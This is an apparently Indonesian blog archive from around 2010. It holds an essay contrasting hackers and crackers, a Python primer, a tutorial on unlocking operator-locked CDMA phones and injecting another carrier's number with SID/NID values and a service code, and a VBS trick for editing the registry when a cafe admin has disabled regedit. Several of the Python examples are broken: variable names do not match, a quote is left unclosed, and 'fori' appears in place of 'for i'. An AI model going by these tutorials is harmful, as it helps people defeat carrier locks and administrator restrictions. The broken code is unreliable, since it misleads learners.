Sebab, pada tahun 1960 tersebut untuk pertama kalinya FBI menangkap kelompok kriminal komputer The 414s yang berbasis di Milwaukee AS. 414 merupakan kode area lokal mereka. Kelompok yang selanjutnya disebut hacker tersebut dinyatakan bersalah atas pembobolan 60 buah komputer, dari komputer milik Pusat Kanker Memorial Sloan-Kettering hingga komputer milik Laboratorium Nasional Los Alamos. Salah seorang dari antara pelaku tersebut mendapatkan kekebalan karena testimonial-nya, sedangkan 5 pelaku lainnya mendapatkan hukuman masa percobaan.

Pada perkembangan selanjutnya muncul kelompok lain yang menyebut diri hacker, padahal bukan. Mereka ini (terutama para pria dewasa) yang mendapat kepuasan lewat membobol komputer dan mengakali telepon (phreaking). Hacker sejati menyebut orang-orang ini 'cracker' dan tidak suka bergaul dengan mereka. Hacker sejati memandang cracker sebagai orang malas, tidak bertanggung jawab dan tidak terlalu cerdas. Hacker sejati tidak setuju jika dikatakan bahwa dengan menerobos keamanan seseorang telah menjadi hacker.

Para hacker mengadakan pertemuan setiap setahun sekali yaitu diadakan setiap pertengahan bulan Juli di Las Vegas. Ajang p pertemuan hacker terbesar di dunia tersebut dinamakan Def Con. Acara Def Con tersebut lebih kepada ajang pertukaran informasi dan teknologi yang berkaitan dengan aktivitas hacking.

Event pertemuan para hacker di Indonesia di motori oleh komunitas Yogyafree dan Jasakom yang sifatnya insidentil serta pertemuan yang sifatnya bersamaan dengan event Seminar Nasional, dll.

Melalui Komunitas White Hacker ini, Yogyafree mengarahkan dan membekali member dengan wawasan berbagai teknik hacking maupun pengetahuan dalam security system serta pengetahuan mengenai IT secara luas.

-------------------------------------
Pengertian Hacker & Cracker
-------------------------------------

1. Hacker
Hacker adalah sebutan untuk mereka yang memberikan sumbangan yang bermanfaat kepada jaringan komputer, membuat program kecil dan membagikannya dengan orang-orang di Internet. Sebagai contoh : digigumi (Grup Digital) adalah sebuah kelompok yang mengkhususkan diri bergerak dalam bidang game dan komputer. Digigumi ini menggunakan teknik teknik hexadecimal untuk mengubah teks yang terdapat di dalam game. Contohnya, game Chrono Trigger berbahasa Inggris dapat diubah menjadi bahasa Indonesia. Oleh karena itu, status Digigumi adalah hacker, namun bukan sebagai perusak.

Hacker disini artinya, mencari, mempelajari dan mengubah sesuatu untuk keperluan hobi dan pengembangan dengan mengikuti legalitas yang telah ditentukan oleh developer game. Para hacker biasanya melakukan penyusupan-penyusup an dengan maksud memuaskan pengetahuan dan teknik. Rata - rata perusahaan yang bergerak di dunia jaringan global (internet) juga memiliki hacker.

Tugasnya yaitu untuk menjaga jaringan dari kemungkinan perusakan pihak luar "cracker", menguji jaringan dari kemungkinan lobang yang menjadi peluang para cracker mengobrak - abrik jaringannya, sebagai contoh : perusahaan asuransi dan auditing "Price Waterhouse". Ia memiliki team hacker yang disebut dengan Tiger Team. Mereka bekerja untuk menguji sistem sekuriti client mereka.

2. Cracker
Cracker adalah sebutan untuk mereka yang masuk ke sistem orang lain dan cracker lebih bersifat destruktif, biasanya di jaringan komputer, mem-bypass password atau lisensi program komputer, secara sengaja melawan keamanan komputer, men-deface (merubah halaman muka web) milik orang lain bahkan hingga men-delete data orang lain, mencuri data dan umumnya melakukan cracking untuk keuntungan sendiri, maksud jahat atau karena sebab lainnya karena ada tantangan. Beberapa proses pembobolan dilakukan untuk menunjukan kelemahan keamanan sistem.

3. Carder
Carder adalah sebutan untuk mereka yang memanfaatkan data kartu kredit orang lain untuk kepentingan sendiri. Sebetulnya Carding ini juga tidak lepas dengan skill Hacking karena Carder sejati / Carder yang asli mendapatkan data kartu kredit orang lain melalui proses Hacking ke Database suatu Webserver ( biasanya Websites eCommerce ). Jadi Carder-pun memiliki skill Hacking…

--------------------------------
Hirarki / Tingkatan Hacker
--------------------------------

1. Elite
Ciri-ciri : mengerti sistem operasi luar dalam, sanggup mengkonfigurasi & menyambungkan jaringan secara global, melakukan pemrogramman setiap harinya, effisien & trampil, menggunakan pengetahuannya dengan tepat, tidak menghancurkan data-data, dan selalu mengikuti aturan yang ada. Tingkat Elite ini sering disebut sebagai ‘suhu’.

2. Semi Elite
Ciri-ciri : lebih muda dari golongan elite, mempunyai kemampuan & pengetahuan luas tentang komputer, mengerti tentang sistem operasi (termasuk lubangnya), kemampuan programnya cukup untuk mengubah program eksploit.

3. Developed Kiddie
Ciri-ciri : umurnya masih muda (ABG) & masih sekolah, mereka membaca tentang metoda hacking & caranya di berbagai kesempatan, mencoba berbagai sistem sampai akhirnya berhasil & memproklamirkan kemenangan ke lainnya, umumnya masih menggunakan Grafik User Interface (GUI) & baru belajar basic dari UNIX tanpa mampu menemukan lubang kelemahan baru di sistem operasi.

4. Script Kiddie
Ciri-ciri : seperti developed kiddie dan juga seperti Lamers, mereka hanya mempunyai pengetahuan teknis networking yang sangat minimal, tidak lepas dari GUI, hacking dilakukan menggunakan trojan untuk menakuti & menyusahkan hidup sebagian pengguna Internet.

5. Lamer
Ciri-ciri : tidak mempunyai pengalaman & pengetahuan tapi ingin menjadi hacker sehingga lamer sering disebut sebagai ‘wanna-be’ hacker, penggunaan komputer mereka terutama untuk main game, IRC, tukar menukar software pirate, mencuri kartu kredit, melakukan hacking dengan menggunakan software trojan, nuke & DoS, suka menyombongkan diri melalui IRC channel, dan sebagainya. Karena banyak kekurangannya untuk mencapai elite, dalam perkembangannya mereka hanya akan sampai level developed kiddie atau script kiddie saja.

Cracker tidak mempunyai hirarki khusus karena sifatnya hanya membongkar dan merusak.
Carder hanya dibedakan sebagai Carder Profesional dan Carder Pemakai.

------------------------
Kode Etik Hacker
-------------------------

* Mampu mengakses komputer tak terbatas dan totalitas.
* Semua informasi haruslah FREE.
* Tidak percaya pada otoritas, artinya memperluas desentralisasi.
* Tidak memakai identitas palsu, spt : nama samaran yang konyol, umur, posisi, dll.
* Mampu membuat seni keindahan dalam komputer.
* Komputer dapat mengubah hidup menjadi lebih baik.
* Pekerjaan yang di lakukan semata-mata demi kebenaran informasi yang harus disebar luaskan.
* Memegang teguh komitmen tidak membela dominasi ekonomi industri software tertentu.
* Hacking adalah senjata mayoritas dalam perang melawan pelanggaran batas teknologi komputer.
* Baik Hacking maupun Phreaking adalah satu-satunya jalan lain untuk menyebarkan informasi pada massa agar tak gagap dalam komputer.

Cracker tidak memiliki kode etik apapun.

----------------------
Aturan Main Hacker
----------------------

Gambaran umum aturan main yang perlu di ikuti seorang hacker sbb, yaitu:

* Di atas segalanya, hormati pengetahuan & kebebasan informasi.
* Memberitahukan sistem administrator akan adanya pelanggaran keamanan / lubang di keamanan yang anda lihat.
* Jangan mengambil keuntungan yang tidak fair dari hack.
* Tidak mendistribusikan & mengumpulkan software bajakan.
* Tidak pernah mengambil resiko yang bodoh – selalu mengetahui kemampuan sendiri.
* Selalu bersedia untuk secara terbuka / bebas / gratis memberitahukan & mengajarkan berbagai informasi & metoda yang diperoleh.
* Tidak pernah meng-hack sebuah sistem untuk mencuri uang.
* Tidak pernah memberikan akses ke seseorang yang akan membuat kerusakan.
* Tidak pernah secara sengaja menghapus & merusak file di komputer yang dihack.
* Hormati mesin yang di hack, dan memperlakukan dia seperti mesin sendiri.

Hacker sejati akan selalu bertindak berlandaskan kode etik dan aturan main sedang Cracker tidak mempunyai kode etik ataupun aturan main karena cracker sifatnya merusak. Thief Hacker adalah hacker yang mencuri target untuk keuntungan pribadi.

-----------------------------------
Perbedaan Hacker & Cracker
-----------------------------------

A. Hacker
* Mempunyai kemampuan menganalisa kelemahan suatu sistem atau situs. Sebagai contoh : jika seorang hacker mencoba menguji situs Yahoo! dipastikan isi situs tersebut tak akan berantakan dan mengganggu yang lain. Biasanya hacker melaporkan kejadian ini untuk diperbaiki menjadi sempurna.
* Hacker mempunyai etika serta kreatif dalam merancang suatu program yang berguna bagi siapa saja.
* Seorang Hacker tidak pelit membagi ilmunya kepada orang-orang yang serius atas nama ilmu pengetahuan dan kebaikan.

B. Cracker
* Mampu membuat suatu program bagi kepentingan dirinya sendiri dan bersifat destruktif atau merusak dan menjadikannya suatu keuntungan. Contoh : Virus, Pencurian Kartu Kredit, Kode Warez, Pembobolan Rekening Bank, Pencurian Password E-mail / Web Server.
* Bisa berdiri sendiri atau berkelompok dalam bertindak.
* Mempunyai situs atau chanel dalam IRC yang tersembunyi, hanya orang-orang tertentu yang bisa mengaksesnya.
* Mempunyai IP yang tidak bisa dilacak ( hidden IP ).
* Kasus yang paling sering ialah Carding yaitu Pencurian Kartu Kredit, kemudian pembobolan situs dan mengubah segala isinya menjadi berantakan. Sebagai contoh : Yahoo! pernah mengalami kejadian seperti ini sehingga tidak bisa diakses dalam waktu yang lama, kasus clickBCA.com yang paling hangat dibicarakan tahun 2001 lalu.

-----------------------------
2 Jenis Kegiatan Hacking
-----------------------------

* Social Hacking, tujuannya : informasi tentang system apa yang dipergunakan oleh server, siapa pemilik server, siapa Admin yang mengelola server, koneksi yang dipergunakan jenis apa, routing system dan security firewall-nya bagaimana lalu bagaimana server itu tersambung internet, mempergunakan koneksi ISP mana lalu informasi apa saja yang disediakan oleh server tersebut, apakah server tersebut juga tersambung dengan LAN di sebuah organisasi dan berbagai informasi lainnya.

~~> mencari data & informasi

* Technical Hacking, merupakan tindakan teknis untuk melakukan penyusupan ke dalam system, baik dengan alat bantu (tool) atau dengan mempergunakan fasilitas system itu sendiri yang dipergunakan untuk menyerang kelemahan (lubang keamanan) yang terdapat dalam system atau service. Inti dari kegiatan ini adalah mendapatkan akses penuh kedalam system dengan cara apapun dan bagaimana pun.

~~> Mencari celah keamanan, menyerang dan menguasai system

----------------------------
Akibat yang ditimbulkan
oleh Hacker & Cracker
----------------------------

1. Hacker
Membuat teknologi internet semakin maju karena hacker menggunakan keahliannya dalam hal komputer untuk melihat, menemukan dan memperbaiki celah kelemahan sistem keamanan dalam sebuah sistem komputer ataupun dalam sebuah software, membuat gairah bekerja seorang Administrator maupun Developper kembali hidup karena hacker membantu Administrator untuk memperkuat jaringan mereka dan membantu Developper untuk menciptakan software yang lebih baik lagi.

2. Cracker
Merusak dan melumpuhkan keseluruhan sistem komputer, sehingga data-data pengguna jaringan rusak, hilang, ataupun berubah.

--------------------------------
To Day Hacker Community
--------------------------------

1. White hacker atau White Hacker Community
Adalah Personal atau sekelompok orang / komunitas yang mengunakan hacking untuk kepentingan dan bertujuan yang positif serta untuk mencari celah keamanan suatu system maupun suatu software serta memperbaiki celah keamanan yang ditemukan tersebut ( atau menginformasikan celah keamanan yang ditemukan kepada pemilik system tersebut ). Berani menampakkan dirinya secara terang-terangan, ada struktur organisasi yang jelas dan tanggung jawab ada pada masing2 personal pelakunya maupun pada Organisasi serta mau berbagi ilmu / sharing pengalaman dengan public.

2. Black Hacker atau Black Hacker Community
Adalah Personal atau sekelompok orang / komunitas yang mengunakan hacking untuk kepentingan pribadi dan bertujuan merusak, mencuri data / informasi, mengunakan Carding untuk keuntungan pribadi, serta merugikan orang lain, dll. Tidak berani menampakkan dirinya secara terang-terangan dan tanggung jawab ada pada masing2 personal pelakunya. Serta lebih menyukai gaya hidup individual dari pada bermasyarakat.

3. Blue Hat
Adalah Personal atau sekelompok orang / komunitas yang mengunakan hacking sebagai security advisor…

-------------
Conclusion
-------------

Para Hacker menggunakan keahliannya dalam hal komputer untuk melihat, menemukan dan memperbaiki kelemahan sistem keamanan dalam sebuah sistem komputer ataupun dalam sebuah software. Oleh karena itu, berkat para hacker-lah Internet ada dan dapat kita nikmati seperti sekarang ini, bahkan terus di perbaiki untuk menjadi sistem yang lebih baik lagi.

Maka Hacker dapat disebut sebagai Pahlawan IT sedang Cracker dapat disebut sebagai Penjahat IT karena melakukan melakukan penyusupan dengan maksud menguntungkan dirinya secara personallity dengan maksud merugikan orang lain. Hacker atau White Hacker sifatnya membangun dan Cracker atau Black Hacker sifatnya membongkar dan merusak.

IT adalah ASSET Strategic bagi perusahaan untuk mengalah kompetitor. Kondisi Internal IT yang sehat sangat mendukung performance seluruh departemen dalam perusahaan.
Tips Proteksi PC dari Hacker

1. Gunakan Antivirus, Firewall, AntiSpyware.
2. Uptodate Virus Engine.
3. Proteksi IPS ( Intrusion prevension System ) & IDS (Intrusion Detection System)
4. Backup OS & Data PC.
5. Update Pacth Security ( OS Server, Client, DBServer ).
6. Policy & Monitoring semua Device PC yang tepat.
7. Maintenance secara berkala, terutama PC yang sering dipakai untuk koneksi internet minimal 1 minggu sekali.

----------------------------
Survey Membuktikan…
-------------------------------

Kerugian yang di timbulkan oleh Black Hacker terhadap target corporate sangat besar, khususnya perbankan maupun e-Commerce / Online Transaction serta interkoneksi antar cabang.

Komunitas White Hacker berperan sangat penting dalam membuka wawasan masyarakat maupun Corporate akan pentingnya fungsi proteksi security system untuk melindungi data perusahaan daripada akses orang lain yang tidak berhak.

COMPUTER CRIMES THE NCCS INVESTIGATES INCLUDE

* Intrusions of the Public Switched Network (the telephone company)
* Major computer network intrusions
* Network integrity violations
* Privacy violations
* Industrial espionage
* Pirated computer software
* Other crimes where the computer is a major factor in committing the criminal offense

-------------------------
Info Hacking Activity
-------------------------

* Training & Workshop, materi Hacking & Security Protection / membangun Firewall untuk Warnet, SOHO dan Corporate serta inhouse.

* HackintOSH, ( IatkOS & KallyWay ) komunitas Hacker sedang mengembangkan MAC OS X agar bisa RUNNING di Machine x86 (AMD / Intel Base).

=> NX Bit ( No eXecute ) & XD bit ( eXecute Disable
).http://www.osx86scene.com
http://www.maconintel.com

* Yogyafree mengembangkan Study OS maupun Aplikasi openSource. => Linux OS, OpenOffice, LDAP, MDS / linux Directory Service, mySQL, PostGreSQL, dll.

#######################################
Sumber : Yogyafree Hacker Community Regional Surabaya
#######################################

Membuat Program dengan menggunakan python

2010-09-14T14:51:00.000-07:00

Bahasa pemrograman Python merupakan bahasa pemrograman script, program yang dibuat dengan menggunakan Python dapat dijalankan dengan menggunakan interpreter Python. Bahasa pemrograman ini merupakan bahasa pemrograman yang cukup banyak digunakan dalam lingkungan Unix atau pun web.
Banyak produk yang telah dihasilkan oleh Python, ZOPE merupakan salah satu produk dari python untuk pengelolaan web dinamik dalam Internet. Kita dapat memanfaatkan ZOPE untuk memudahkan kita memaintenance web kita, seperti halnya kita menggunakan PHPNuke, PostNuke, atau pun yang sejenisnya.
Python merupakan bahasa pemrograman yang sangat sederhana serta efektif, dan sangat baik untuk digunakan dalam mempelajari tentang pemrograman berorientaaasi objek.
Python merupakan bahasa pemrograman yang disertifikasi kan oleh OSI atau disebut juga dengan Open Source Initiative. . Python juga merupakan salah satu bahasa pemrograman yang paling bisa dikatakan sangat diakui keunggulannya, sehingga Microsoft pun tertarik untuk mengembangkan sistem python di lingkungan Windows dengan membiayai ActiveState untuk membuat ActivePython.
Bahasa Python pun diturunkan dari keluarga bahasa Modula, tetapi cara penulisan meniru seperti Lisp, pemrograman berorientasi objek seperti SmallTalk, pemrograman fungsional seperti FP, dan kemudahan meniru pemtarograman shell Unix.

Sejarah
Python dikembangkan pertama kali oleh Guido van Rossum, di stichting Mattematics Centrum, Amsterdam,pada tahun 1991. Awalnya merupakan bagian dari ‘Amoeba Project’ di CWI Belanda. Guido komudian melepaskan Python melalui FTP Internet, sambil terus dikembangkan sehingga diterima oleh banyak pemrogram dewasa ini, sehingga menjadi produk.
bahasa pemrograman Python pertama kali muncul di lingkungan Unix. Pada Saat ini telah ada juga di lingkungan Windows, tetapi masih tetap menggunakan mode DOS atau teks dan masih sebagai bahasa pemrograman untuk DOS. JPython adalah Python untuk Java.
bahasa pemrograman ini dapat juga digunakan untuk pemrograman dengan menggunakan interface grafik sebagai keluarannya dengan memanfaatkan librari tcl/tk.
Menjalankan Python
Pastikan bahwa Python anda telah dipasang pada komputer anda.apabila belum anda bisa memasang sendiri atau meminta tolong kepada administrator.
Program Python umumnya dipasang sebagai /usr/local/bin/python, masukkan ke dalam variabel environment PATH pada sistem operasi direktori /usr/local/bin apabila belum ada, agar Python dapat dipanggil dengan hanya dengan perintah :
python
Jika pemanggilan di atas belum dapat dilakukan, berarti path kepada Python belum masuk ke dalam variabel environment PATH. Periksa keberadaan Python dengan menggunakan perintah:
which python
Perintah which akan memberikan lokasi direktori dari Python. Masukkan direktori Python yang dihasilkan ke dalam variabel environment PATH, dengan perintah seperti berikut:
export PATH=$PATH:/usr/bin
Pemanggilan python yang baru saja kita lakukan merupakan proses mengaktifkan interpreter Python, kita berada pada lingkungan Python yang interaktif, ditandai dengan prompt > > >.
Pada mode interpreter ini kita juga dapat langsung berinteraksi dengan menggunakan Python dalam membuat program atau pun memanfaatkan Python sebagai kalkulator.
Cobalah beberapa perintah berikut ini agar pengguna dapat melihat bagaimana Python digunakan sebagai interpreter yang interaktif, sebagai
kalkulator:
5+6
7*8
25 % 2
20+5*10/2

Untuk keluar dari lingkungan Python anda cukup dengan menekan .
Selain itu dapat digunakan sebagai interpreter yang interaktif, Python dapat digunakan juga untuk menjalankan script yang dapat dituliskan dalam file. File ini berisi urutan dan konstruksi script Python sehingga dapat membentuk suatu aplikasi.
Cara menjalankan script adalah sebagai berikut:
python nama_script_python.py
Lebih jelasnya kita akan lihat pada penjelasan pemrograman Python.

Dasar Pemrograman Python
File program Python disebut juga sebagai script Python,Mengapa???
karena Python adalah bahasa pemrogrman script. Ekstensi script Python
adalah .py. Script Python yang diibuat dengan menggunakan editor teks seperti halnya notepad yang di lingkungan sekitarWindows, atau edit yang di lingkungan DOS, atau vi apabila menggunakan Unix. Struktur program Python ditandai dengan menggunakan blok-blok yang menjorok masuk ke dalam (indentation). Python menerapkan case sensitiv dalam perintah-perintah programnya, membedakan antara huruf besar atau capital dan huruf kecil atau lower case. Karenanya perlu kehati-hatian dalam menulis
script python.

Konstruksi program Python sama seperti halnya dengan bahasa pemrograman tingkat tinggi lainnya, yang memiliki konstruksi:
• Urutan
• Pemilihan
• Pengulangan
Urutan
Konstruksi urutan merupakan konstruksi yang paling dasar dari semua program komputer, setiap perintah akan dijalankan dari baris paling atas sampai dengan paling bawah secara berurutan.
Contoh script: coba.py
bill =3
bil2=2
jml=bill+bil2
print “Penjumlahan”
print bil1
print”+”
print bil2
print “=”
print jml
Script coba.py merupakan aplikasi yang dapat digunakan dalam proses menjumlahkan isi dari dua buah variabel (bil1 dan bil2) yang sudah diisi dengan data-data, kemudian hasil penjumlahannya disimpan ke dalam variabel jml, kemudian menuliskannya kepada standar output atau screen dengan tulisan “Penjumlahan” dan isi variabel-variabel yang digunakan untuk menyimpan data. Jalankan script menggunakan interpreter Python:
python coba.py

print “Penjumlahan”
bil1=input(”Masukkan bilangan pertama”)
bil2=input(”Masukkan bilangan kedua “)
jml=bil1+bil2
print “Hasil penjumlahan kedua bilangan yang dimasukkan adalah
print jml
Script cobainput.py dijalankan dengan python:
python cobainput.py

Script cobainput.py menggunakan perintah input([prompt]) untuk dapat menerima masukan dari standar input (keyboard), kemudian memasukkannya ke dalam variabel.
Pemilihan
Konstruksi pemilihan merupakan konstruksi program yang dapat memungkinkan sebagian blok perintah hanya akan dapat dikerjakan berdasarkan suatu kondisi pada baris perintah sebelumnya, dan atau sebagian blok perintah lainnya dapat dikerjakan berdasarkan kondisi lainnya lagi.
Salah satu konstruksi pemilihan dalam Python dikenal dengan konstruksi if atau if else.
Bentuk umum:
if kondisil:
blok perintah berdasar kondisil benar
[else:
blok perintah berdasar kondisil salah ]
Perhatikan cara menuliskan blok perintah yang harus dieksekusi. Blok perintah harus diindent untuk menunjukkan bagian dari if apabila kondisi benar, dan blok perintah setelah else menunjukkan jika kondisil salah
Script ganjilgenap.py menggunakan konstruksi if, yang digunakan untuk dapat menampilkan suatu pesan apakah bilangan yang dimasukkan dari keyboard, ganjil atau genap. Pada script ini ditunjukkan blok perintah setelah if dikerjakan apabila kondisi pembagian sisa dengan 2 hasilnya adalah nol berarti benar,apabila salah maka blok setelah else yang akan dikerjakan.

Pengulangan
Konstruksi pengulanganmerupakan sebuah konstruksi program yang dapat digunakan agar perintah-perintah yang ada dapat diulang-ulang pengerjaannya sesuai dengan kriteria yang didefinisikan. Salah satu konstruksi pengulangan dalam Python adalah for, yang secara umum memiliki skema sebagi berikut:

Nilai adalah batas atas proses pengulangan yang harus dilakukan,
var adalah variabel yang dapat menyimpan nilai diawali dengan 0, yang kemudian secara otomatis dapat bertambah satu setelah semua perintah dalam blok perintah dikerjakan satu kali.
Blok perintah adalah perintah-perintah yang akan dieksekusi oleh Python apabila kriteria pengulangan pada for masih dipenuhi (benar).
Contoh script: tulishellolOx.py
fori in range (10):
print i, “Hello”
Script tulishellolOx.py dijalankan:
python tulishellolOx.py

Pembahasan Python seLanjutnya
Pembahasan tentang Python lebih lanjut dapat dipelajari dari buku yang khusus membahas tentang Python termasuk bagaimana menggunakannya dalam pembuatan aplikasi berbasis web untuk Intranet/Internet. Dokumentasi dari Python dapat dijadikan acuan untuk pembelajaran awal. Pembahasan dalam bab ini sekedar untuk menunjukkan bagaimana kita dapat menggunakan Python untuk membuat program script.
Pembahasan Python seLanjutnya.

Tutorial Hacking Ponsel CDMA

2010-09-14T03:36:00.000-07:00

Berawal dari Handphone murah yang dikeluarkan oleh Samsung (N356) bekerjasama dengan group jaringan telepon selular Mobile8 Fren, dengan iklan yang tidak asing lagi ditelinga kita “hari gini ga punya handphone??”, membawa kita untuk memiliki ponsel seharga Rp. 1 juta-an menjadi Rp. 388.000 (bahkan ada yang menjual Rp. 356.000) plus Kartu Perdana (Fren) dengan Pulsa Rp. 38.800. Tutorial singkat, jelas dan padat ini akan membawa anda untuk menelurusi unlock & injeksi pada handphone CDMA & Setting NAM untuk melakukan perubahan frekuensi, suntik nomor, ganti operator, dsbnya.
Hal ini menjadi ajang untuk mengumpulkan uang bagi beberapa toko di ITC khususnya Roxy Mas. Dan secara sepihak dari pihak Fren sendiri merasa dirugikan karena uang subsidi dari N356 tetap dibayarkan kepada Samsung, sedangkan mengunakan Kartu Selular yang lain, yakni ESIA. Mengapa ESIA, karena ESIA memiliki frekuensi yang sama dengan FREN. Unlock & Injection serta Setting NAM untuk ponsel N356 dari FREN ke ESIA sudah terjadi cukup lama, berawal dari iklan di TV, selang 15 hari kami berhasil merubah FREN ke ESIA untuk pertama kalinya.

Tutorial ini dibuat semata-mata hanya untuk ilmu pengetahuan dan teknologi, bukan untuk menjatuhkan atau menguntungkan pihak2 terkait. Saya tidak bertanggung jawab atas akibat yang ditimbulkan dari tutorial ini, baik untuk personal, komersial serta untuk toko, lembaga, atau siapapun juga. Saya menganggap anda telah menyetujui apa yang saya telah paparkan dan telah mengerti secara bijaksana tentang segala sesuatu tentang tutorial ini. Silahkan menikmati sajian dari kami dan tetap BIJAKSANA!

LATAR BELAKANG : INJECTION & SETTING NAM

Inject adalah suatu sebutan untuk sistim yang menggunakan handset CDMA tanpa menggunakan RUIM card. Seluruh pengguna CDMA di dunia, mengunakan sistim inject untuk mengaktifasikan simcardnya, kecuali di Indonesia, baru saat-saat ini saja trend di kalangan penguna ponsel. Mengapa? Karena di luar negeri tidak ada ITC Roxymas, dimana kita dapat membeli ponsel dengan bebas. Di luar negeri saat kita ingin membeli handphone baru, kita harus pergi dan beli di operator terkait. Rupanya sistim seperti ini ditiru oleh beberapa vendor penyedia jasa handphone di Indonesia, seperti Fren Mobile8 (ada juga flexi, starone, dan esia). Sebagai contoh Frenship, mempromosikan :
1. Paket langganan ? bulan, minimum pemakaian ? dapat handphone ? gratis.
2. Paket Samsung N356 (Frenship ‘ hari gini gak punya handphone??)
mau beli handphone ini harus pake operator Fren Mobile-8. Demikian juga esia, flexi, serta starone. Handset ini tidak menyediakan RUIM Card Slot (meskipun ada beberapa tipe HP yang memilikinya, tapi biasanya akan lebih mahal harganya), saat kita beli biasanya sudah ada nomornya atau harus di inject / masukan terlebih dahulu nomornya, lalu tekan tombol CALL langsung KRIIING/AKTIF.
Dan biasanya handset yg dipaketkan oleh operator diLOCK (dikunci), supaya penguna tidak bisa berpaling ke operator lain. Rupanya handphonepun memiliki copyright juga, bukan hanya buku atau software aplikasi. Semakin ada copyrightnya, banyak orang yang tertantang dngan sendirinya untuk mengunlock, supaya dapat diganti/dirubah sesuai dengan keinginannya. Setelah Unlock >> Inject >> Setting NAM dan akhirnya KRIIING.

TEKNIS INJECTION & SETTING NAM

Saat kita meng-inject suatu HP, berarti kita ingin memasukan suatu Operator ke dalam handphone kita. Beberapa ilustrasi yang dapat menjelaskan mengenai inject & setting nam, sebelum kita melakukan Unlock, seperti :
1. Di dalam hati (Sistim Komputer) operator pada no telepon (0888xxxxxxx) kamu, harus ditaruh nomor ESN HEX handset kamu
2. Di dalam hati (Setting NAM) handset kamu harus ada no telepon (0888xxxxxxx) kamu dan settingan lainnya seperti SID/NID, primary channel dan secondary channel, dll.

Jadi kalau kita hanya Setting NAM di handset, jelas tidak akan bisa terpakai dan tidak dikenal oleh Operator, seharusnya dibawa ke operator terlebih dahulu, diinject baru setting NAM, dan langsung KRIIIING...G. Tetapi hal ini tidak berlakukan jika ponsel yang kita miliki di Unlock, kita harus terlebih dahulu untuk Unlock setelah itu baru diinject lalu Setting NAM. Kita akan pelajari kembali lebih dalam tentang Unlocking karena disini permainan baru dimulai.
Berikut ini SID/NID untuk di Jakarta dan sekitarnya :

FLEXI 10496
STARONE 10819
FREN 10530
ESIA 10623

Channel Flexi (JAKARTA)
primary A 119 atau 725
primary B 37 atau 750
secondary A 78 atau 775
secondary B 777

Channel Starone (JAKARTA)
primary A 625
primary B 675
secondary A 650
secondary B 777

Channel FREN (JAKARTA)
primary A 25
primary B 37
secondary A 466
secondary B 777

Channel ESIA (JAKARTA)
primary A 30
primary B 72
secondary A 78
secondary B 777

Diluar negeri SID/NID sangat terbuka, hampir seluruh pengunakan ponsel CDMA mengetahuinya, tidak seperti di Indonesia, yang tau hanyalah operator terkait, dan pada akhirnya kita tidak dapat berkembang dan hanya tergantung oleh operator yang terkait, maka dari itu Indonesia tidak pernah maju.
CARA MELIHAT SID/NID DI KOTA LAINNYA

Tidak perlu sulit-sulit kita untuk mendapatkan informasi nilai SID/NID di kota-kota lain dan mungkin saja SID/NID yang dipaparkan sudah berubah karena awal Feb 2005, operator CDMA lebih waspada akan injection & setting NAM yang dapat dilakukan sendiri. Untuk mengetahui SID/NIC, primary, secondary channel dan settingan lain dari berbagai operator, caranya :

1. Siapkan handset NOKIA RUIM
2. Masukkan kartu RUIM
3. Nyalakan Handphonenya (jangan lupa loh)
4. Tekan *3001#12345#
5. Pilih NAM1
6. Disana akan terlihat settingan2 untuk SID/NIC, lainnya.

GAGAL INJECT & SETTING NAM

Beberapa kegagalan saat Inject & Setting NAM, pada umumnya dikarenakan
1. Operator keliru memasukan no. ESN di database server mereka.
2. Salah memasukan dihandset dan setting2an lainnya.
3. Salah Pilih frekwensi, untuk handset dualband biasanya Automatic A = 1900 Mhz, Automatic B = 800 Mhz, dan lainnya.
4. Nomor ESN yang tertera pada mesin berbeda dengan yg dibody. Ikuti ESN mesin, bila dimesin dalam DEC, harus mengubahnya menjadi HEX.
5. PRL handset yang tidak sesuai / tidak cocok, kebanyakan harus di upgrade / flash ke versi yang lebih tinggi.
6. Handset rusak baik kerusakan Hardware / Software.

MATEMATIKA DALAM ESN DEC ke ESN HEX

Kode ESN DEC tidak akan dapat masuk didalam database operator, maka dari itu kita perlu convert dari ESN DEC ke ESN HEX.

DEC = Desimal (bilangan 10)
HEX = Heximal (bilangan 16)
Cara paling mudahnya :
1. Siapkan Kalkulator Scientific, atau pake Kalkulator PC, ubah ke Bentuk Scientific.
2. Tulis ESN DEC diatas sehelai kertas. Pisahkan 3 nomor pertama dari sisanya. Misalnya 123 45678901
3. Gunakan kalkulator untuk ubah 3 nomor pertama tersebut menjadi HEX, kalo di PC tinggal klik/tekan button HEX, lalu ubah nomor sisanya mejadi HEX

Dari 12356789
menjadi 123 456789
lalu ke hex 7B 6F855 -> yang akan dimasukan ke DB!

ada yg mw nyoba??
tp gw gag tnggung jawab lho.... Evil or Very Mad

Cara Merubah Registry tanpa RegEdit

2010-09-12T12:58:00.000-07:00

Bagi anda para netter yang sering di warnet, pasti akses ke regedit di-disable oleh admin warnet.

Ada caranya kok, agar anda dapat mengakesesnya kembali.
Dengan VBS yang memiliki kepanjangan VisualBasic Script, anda bisa lakukan itu.

Saya akan memberikan contoh yaitu “mempercepat jalannya windows” dengan value yang bisa kita ketikkan terserah kita.

Langsung aja, buka Notepad anda.
INGAT! non-aktifkan Word Wrap (ada pada menu Format) terlebih dahulu.

Ketikkan code seperti ini :

dim natan
masuk()
sub masuk()
set netan = wscript.CreateObject("wscript.shell")
keterangan = "masukan nilai atau value delay yang anda mau:" & vbcrlf &_
"angka jangkauannya: 0-400" &vbcrlf &_
"by : PrOReBeLL | Devilzc0de"
kotak = inputbox (keterangan, "fast your windows",0)
netan.RegWrite "HKEY_CURRENT_USER\Control Panel\Desktop\MenuShowDelay",kotak, "REG_SZ"
msgbox "Yeah..Berhasil! Registry telah diubah", vbInformation,"Hehehe...Sukses kan ?? PrOReBeLL"
end sub

Setelah itu save as note ini dengan nama"cepat.vbs". lalu anda jalankan dengan double click !
Selamat Mencoba !!

10 Tips Wireless Security

2010-09-12T12:50:00.000-07:00

Assalamualaikum wr.wb...
Hmm...sekarang akan kita coba untuk pembelajaran tentang keamanan ( security ) terhadap wireless..

Adapun langkah langkahnya sebagai berikut:

